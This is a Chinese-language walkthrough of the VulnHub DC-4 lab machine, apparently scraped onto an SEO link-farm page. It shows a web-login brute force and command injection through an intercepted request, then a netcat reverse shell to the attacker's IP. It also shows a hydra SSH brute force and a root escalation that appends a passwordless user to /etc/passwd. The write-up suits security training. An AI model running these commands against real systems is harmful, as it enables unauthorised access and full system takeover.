当前位置: 首页 > wzjs >正文

美观网站建设价格新手学做网站图

美观网站建设价格,新手学做网站图,申报网站建设理由 模板,唐山路南网站建设下载地址:https://www.vulnhub.com/entry/dc-4,313/ 扫描IP地址 arp-sacn -l扫描端口,开启了80和22端口 nmap -p- 192.168.112.140访问80端口 扫描目录,并没有发现敏感目录 尝试爆破 爆破成功,用户名admin 密码happy 登录成功 …

下载地址:https://www.vulnhub.com/entry/dc-4,313/

扫描IP地址

arp-sacn -l

扫描端口,开启了80和22端口

nmap -p- 192.168.112.140

访问80端口

扫描目录,并没有发现敏感目录

尝试爆破

爆破成功,用户名admin 密码happy

登录成功

里面是已经执行的三个命令,

ls -l

du -h

df -h

既然可以执行命令,那就可以尝试抓包来修改命令

成功执行whoami

尝试写一句话木马进去,但是我们的php代码被过滤了

换一种方式,尝试反弹shell

nc+192.168.112.132+4444+-e+/bin/bash

成功反弹

接下来就是提权

先看一下版本信息

uname -a

并没有可以利用的脚本

之前nmap扫出有22端口,那可以看一下/home目录下的用户

在jim目录下面找到了一些文件,

jim目录下面有一个文件夹和两个文件,mbox没有权限,test.sh不知道写的啥

只有backups目录下面有一个旧密码备份,这里面应该就有jim的ssh密码

使用hydra爆破一下,将密码字典复制到kali,新建文本文件ps.txt作为hydra的爆破字典

hydra -l jim -P ./ps.txt 192.168.10.150 ssh

得到jim的密码为 jibril04

使用ssh成功登录到jim用户

jim目录权限可以查看mbox文件

里面提示我们在/var/emi里面有一封邮件

邮件内容是我们的另一个用户charles发给jim的,里面有他的密码^xHhA&hvim0y

切换到charles用户,查看一下sudo授权

发现可以无密码执行/usr/bin/teehee

teehee命令可以往一个文件追加内容,可以通过它向/etc/passwd写入内容,新增一个超级用户

向passwd文件中追加一个超级用户

echo "hack::0:0:::/bin/bash" | sudo teehee -a  /etc/passwd

成功提权,找到flag

http://www.dtcms.com/wzjs/835833.html

相关文章:

  • 安徽建网站公司手机网页打不开
  • 企业网站如何找词张家港做网站多少钱
  • 那些网站是做俄罗斯鞋子郑州网络运营平台有哪些
  • 北京智联招聘官方网站做家政设计邦官网
  • 程序员个人博客网站学习做网站可以吗
  • 智能小程序下载仓山区seo引擎优化软件
  • 做网站去哪找客户网站感谢页面
  • 揭阳网站制作教程海力建设集团有限公司网站
  • 云南SEO网站建设服装网站建设的需求
  • 想找私人做网站android开发入门教程
  • 搭建网站怎么挣钱泰安房地产信息网官网
  • 潍坊手机网站制作做网站是什么职业
  • 九洲建设集团网站网站域名不想实名认证
  • 建立一个网站需要什么技术九九人才网赣州招聘
  • 九江网站推广wordpress恢复数据
  • 宝安网站设计流程wordpress入侵工具
  • 企业网站有哪些平台昭通网站建设 hardlcp
  • 中国建设银行龙卡网站网页制作基础任务教程慕课版答案
  • 企业网站商城建设方案杭州做肉松饼的网站有多少家
  • 湖南网站seo营销网页界面设计图
  • 巴中市建设局新网站义乌小程序装修公司
  • 网站的优化用什么软件厦门人才网个人会员登录
  • 安徽建设厅网站施软件工程考研难度大吗
  • 网站建设策划怎么沟通外贸网站建设模式
  • wordpress主页与文章页四川seo排名
  • 邢台市政建设集团网站珠海网站建设建站模板
  • 网站的备案信息域名不一样网络品牌推广方案
  • 校园二手书交易网站开发wordpress音乐模板
  • 安康市住房和城乡建设局网站抖音商家页面模板
  • 查看网站的 cms济南住房和城乡建设局网站